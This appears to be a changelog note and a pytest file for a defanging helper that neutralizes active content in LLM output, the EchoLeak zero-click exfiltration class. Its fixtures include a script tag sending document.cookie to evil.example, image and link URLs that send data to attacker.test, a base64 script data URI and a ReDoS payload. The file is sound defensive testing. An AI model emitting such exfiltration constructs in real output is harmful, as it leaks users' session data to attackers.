`is_active_tag`'s URL-attribute branch was a presence test: any element carrying `href=`/`src=`/`action=` graded HIGH regardless of where the URL pointed. An MDX `<Card href="/en/agent-sdk/quickstart">` reaches no attacker-controlled host, and neither does APIM policy XML's `<set-header>`. It now requires an external target -- the rule the markdown paths have applied since 0.3.1. `<base>` left the active name set in the same change: HTML's `<base>` has its whole affordance in an `href` the attribute branch still catches, and APIM's attribute-less `<base />` is inert. Measured before and after in ONE session against one corpus state, because two of the three corpora are living and a split would mix this with re-harvest drift: reference-corpus 389 docs 133 -> 108 (ceiling 107) vendor-harvest 187 docs 100 -> 98 (ceiling 62) generated-notes 550 docs 90 -> 88 (ceiling 49) 96% of the achievable reduction in reference-corpus, 5% in the wiki corpora. The two classes had to be measured TOGETHER -- alone they free 3 and 13 documents, together 25, because a document carrying one usually carries the other. The second surface: `neutralize` imported `is_active_tag` by name, so this would have silently narrowed the opt-in mutator too -- and no test discriminated the two halves, since every `neutralize:raw-html` payload stays active under any narrowing considered. That test is written first here. The predicates are now separate symbols; the mutator keeps defanging anything, because over-defanging is auditable and blocks nothing while under-defanging hands a human a live construct. Behaviour change: a document whose only finding was one of these classes now WARNs instead of holding. Detection is unchanged -- 128/128 classes, 6/6 gaps hold. Self-safety: reading an attribute VALUE needs a pattern the presence test lacks. It reuses the same literal alternation so no new run shape enters the table; its `_REDOS_PAYLOADS` row denies the `=` the pattern requires, since a unit supplying it matches at once and never exercises the run (the lexicon's `script-tag` row is the cautionary case). 0.031-0.046s across five attack shapes at 100_000 chars against a 2.0s bound; `docs/redos-sweep.py` reports 0 candidates of 152. An attribute the presence test saw but the value parser cannot read counts as external -- fail secure. `docs/rawhtml-census.py` gains a PRODUCTION row that re-measures the shipped predicate rather than a hypothesis, so a published number and the code cannot drift apart unnoticed. README's limitation count moves 34 -> 33. 727 passed (was 717).
186 lines
7.7 KiB
Python
186 lines
7.7 KiB
Python
"""Tests for active-content neutralization (build order step 6).
|
|
|
|
``neutralize`` is the opt-in, PURE defang helper for model OUTPUT. It closes the
|
|
EchoLeak class (CVE-2025-32711): active content in persisted model output that a
|
|
downstream renderer auto-fetches (markdown images) or makes clickable, leaking
|
|
data zero-click. These carriers are neither injection strings nor high-entropy,
|
|
so lexicon + entropy miss them entirely.
|
|
|
|
Invariants mirror the sanitizer: clean output returns byte-identical with an
|
|
empty report; only active-content constructs are ever rewritten. Mutation lives
|
|
here, kept separate from the report-only output gate (design principles 3 & 4).
|
|
The transform is pure ``text -> (defanged_text, report)`` — no I/O, no globals.
|
|
"""
|
|
import time
|
|
|
|
import pytest
|
|
|
|
from llm_ingestion_guard.neutralize import neutralize
|
|
from llm_ingestion_guard.report import Severity, Source
|
|
|
|
|
|
def test_clean_output_is_byte_identical():
|
|
text = "A perfectly ordinary wiki paragraph. Costs $5! See section [1] below (really)."
|
|
result = neutralize(text)
|
|
assert result.text == text
|
|
assert result.report.found is False
|
|
|
|
|
|
def test_default_source_is_output():
|
|
# Unlike sanitize/fence (INPUT), this module targets the model's OUTPUT.
|
|
result = neutralize("")
|
|
assert result.report.found is True
|
|
assert all(f.source is Source.OUTPUT for f in result.report.findings)
|
|
|
|
|
|
def test_markdown_image_is_defanged_high_severity():
|
|
# The EchoLeak primitive: an auto-fetched image URL carrying exfiltrated data.
|
|
result = neutralize("")
|
|
assert "https://evil.example" not in result.text # fetchable URL is gone
|
|
assert "hxxps" in result.text
|
|
assert "logo" in result.text # alt text preserved for audit
|
|
img = [f for f in result.report.findings if f.label == "neutralize:markdown-image"]
|
|
assert len(img) == 1
|
|
assert img[0].severity is Severity.HIGH
|
|
assert img[0].detector == "neutralize"
|
|
assert img[0].owasp == "LLM05"
|
|
|
|
|
|
def test_defanged_url_is_not_resolvable():
|
|
result = neutralize("")
|
|
# Scheme neutralized and host dots bracketed -> no renderer will resolve it.
|
|
assert "hxxps://evil[.]example" in result.text
|
|
|
|
|
|
def test_secret_exfil_url_no_longer_fetchable():
|
|
exfil = "STOLEN-SESSION-DATA"
|
|
result = neutralize(f"")
|
|
# The secret text may remain visible, but never inside a fetchable URL.
|
|
assert "http://attacker.test" not in result.text
|
|
assert "hxxp://attacker[.]test" in result.text
|
|
|
|
|
|
def test_inline_link_is_defanged_medium():
|
|
result = neutralize("click [here](https://evil.example/go) now")
|
|
assert "https://evil.example" not in result.text
|
|
assert "here" in result.text
|
|
link = [f for f in result.report.findings if f.label == "neutralize:markdown-link"]
|
|
assert len(link) == 1
|
|
assert link[0].severity is Severity.MEDIUM
|
|
|
|
|
|
def test_image_is_not_double_counted_as_link():
|
|
result = neutralize("")
|
|
labels = {f.label for f in result.report.findings}
|
|
assert "neutralize:markdown-image" in labels
|
|
assert "neutralize:markdown-link" not in labels
|
|
|
|
|
|
def test_reference_style_link_definition_is_defanged():
|
|
text = "See [the doc][ref].\n\n[ref]: https://evil.example/leak"
|
|
result = neutralize(text)
|
|
assert "https://evil.example" not in result.text
|
|
assert any(f.label == "neutralize:reference-link" for f in result.report.findings)
|
|
|
|
|
|
def test_angle_bracket_autolink_is_defanged():
|
|
result = neutralize("read more <https://evil.example/x> here")
|
|
assert "https://evil.example" not in result.text
|
|
assert "hxxps://evil[.]example" in result.text
|
|
assert any(f.label == "neutralize:autolink" for f in result.report.findings)
|
|
|
|
|
|
def test_raw_active_html_is_escaped():
|
|
result = neutralize('<img src="https://evil.example/leak?d=x">')
|
|
assert "<img" not in result.text # no longer renders as active content
|
|
assert "<img" in result.text
|
|
html = [f for f in result.report.findings if f.label == "neutralize:raw-html"]
|
|
assert len(html) == 1
|
|
assert html[0].severity is Severity.HIGH
|
|
|
|
|
|
@pytest.mark.parametrize("cid,text", [
|
|
("relative-href-on-inactive-name", '<Card href="/en/agent-sdk/quickstart">'),
|
|
("attributeless-base", "<base />"),
|
|
])
|
|
def test_mutator_still_defangs_what_the_scanner_now_lets_pass(cid, text):
|
|
# The deliberate asymmetry, extended to raw HTML in 0.6.0: the SCANNER narrowed
|
|
# its URL-attribute branch to external targets and dropped `<base>` from the name
|
|
# set; the opt-in MUTATOR keeps defanging anything. Over-defanging costs nothing
|
|
# here — it is auditable and blocks no disposition — while under-defanging would
|
|
# hand a human a live construct.
|
|
#
|
|
# Pinned because the two predicates are separate symbols as of this change
|
|
# (`is_active_tag` vs `is_defangable_tag`). Before the split, `neutralize`
|
|
# imported the scanner's predicate by name, so narrowing it would have moved the
|
|
# mutator silently — no test in this suite discriminated the two.
|
|
result = neutralize(text)
|
|
assert result.report.found is True, cid
|
|
assert any(f.label == "neutralize:raw-html" for f in result.report.findings), cid
|
|
assert "<" in result.text, f"{cid}: not escaped -- {result.text!r}"
|
|
|
|
|
|
def test_benign_formatting_html_is_left_untouched():
|
|
text = "This is **bold** and <b>strong</b> and <em>emph</em> text."
|
|
result = neutralize(text)
|
|
assert result.text == text
|
|
assert result.report.found is False
|
|
|
|
|
|
def test_script_tag_is_neutralized():
|
|
result = neutralize("<script>fetch('https://evil.example/'+document.cookie)</script>")
|
|
assert "<script>" not in result.text
|
|
assert any(f.label == "neutralize:raw-html" for f in result.report.findings)
|
|
|
|
|
|
def test_standalone_data_uri_is_defanged():
|
|
result = neutralize("open data:text/html;base64,PHNjcmlwdD4= please")
|
|
assert "data:text/html" not in result.text
|
|
assert any(f.label == "neutralize:data-uri" for f in result.report.findings)
|
|
|
|
|
|
def test_data_uri_does_not_match_inside_a_word():
|
|
# "metadata:" must not be mistaken for a data: URI (FP guard, as in sanitize).
|
|
text = "the metadata: field is documented here"
|
|
result = neutralize(text)
|
|
assert result.text == text
|
|
assert result.report.found is False
|
|
|
|
|
|
def test_multiple_images_are_counted():
|
|
result = neutralize(" ")
|
|
img = [f for f in result.report.findings if f.label == "neutralize:markdown-image"][0]
|
|
assert img.count == 2
|
|
|
|
|
|
def test_source_override_is_respected():
|
|
result = neutralize("", source=Source.INPUT)
|
|
assert all(f.source is Source.INPUT for f in result.report.findings)
|
|
|
|
|
|
def test_prose_with_lone_brackets_and_angles_is_identical():
|
|
# FP guards: none of these are active constructs.
|
|
text = "if a < b and c > d then see [note] and call f(x)."
|
|
result = neutralize(text)
|
|
assert result.text == text
|
|
assert result.report.found is False
|
|
|
|
|
|
# --- self-safety (OWASP LLM10): the long-attribute arm -----------------------
|
|
# Second call site of the same defect pinned in test_active_content.py: the
|
|
# defanger runs `URL_IN_TEXT_RE` over each active tag's body. 14.9s at 100_000
|
|
# chars, exponent 1.91-2.22. `neutralize` applies no input cap either.
|
|
_ATTR_REDOS_N = 100_000
|
|
|
|
|
|
def test_crafted_long_attribute_tag_stays_bounded():
|
|
payload = "<a " + "A" * _ATTR_REDOS_N + ">"
|
|
start = time.monotonic()
|
|
neutralize(payload)
|
|
assert time.monotonic() - start < 2.0
|
|
|
|
|
|
def test_url_defanging_inside_a_tag_survives_the_redos_fix():
|
|
result = neutralize("<a href=-http://evil.com>x</a>")
|
|
assert "hxxp" in result.text
|
|
assert "http://evil.com" not in result.text
|